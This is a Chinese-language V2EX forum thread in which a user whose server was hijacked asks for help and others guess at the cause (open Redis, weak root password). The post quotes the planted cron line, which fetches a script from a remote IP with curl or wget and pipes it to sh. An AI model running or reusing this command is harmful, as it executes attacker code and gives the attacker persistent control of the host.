我也中招了，服务器被抓肉鸡了

2019-12-31 11:11:16 +08:00

densuc

cron 里被植入：

*/15 * * * * (/usr/bin/qjowfa8||/usr/libexec/qjowfa8||/usr/local/bin/qjowfa8||/tmp/qjowfa8||curl -m180 -fsSL http://157.245.59.230:8000/i.sh||wget -q -T180 -O- http://157.245.59.230:8000/i.sh) | sh

大佬们有什么头绪吗?大概是个挖矿脚本？重装 ing....

2691 次点击

所在节点

问与答

4 条回复

R18

2019-12-31 11:16:55 +08:00

Redis 开了公网没密码

luvroot

2019-12-31 11:28:18 +08:00

/usr/bin/qjowfa8 把这个搞下来看一下

densuc

2019-12-31 11:48:45 +08:00

@R18 可能是我 root 密码太弱的原因，我没有安装 Redis。。。

@luvroot 我已经重装了。。。不过在新系统上运行了，好像暂时是个空文件，可能要挖矿后才会写入？

jasonyang9

2019-12-31 11:59:59 +08:00

类似的，前天在家里弄了台旧笔记本配上 CentOS 7，PPPoE 拨号，IP Forwarding 和 Masquerading，当然还有 Firewalld，充当路由器玩玩的，帐密登录，心想第二天再改 RSA 密钥登录吧，想不到当晚就被黑了。早上起来看到 CPU 基本泡满，哈哈，还好家里其它设备没影响。立马下线重装。。。

第 1 页／共 1 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/633819

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.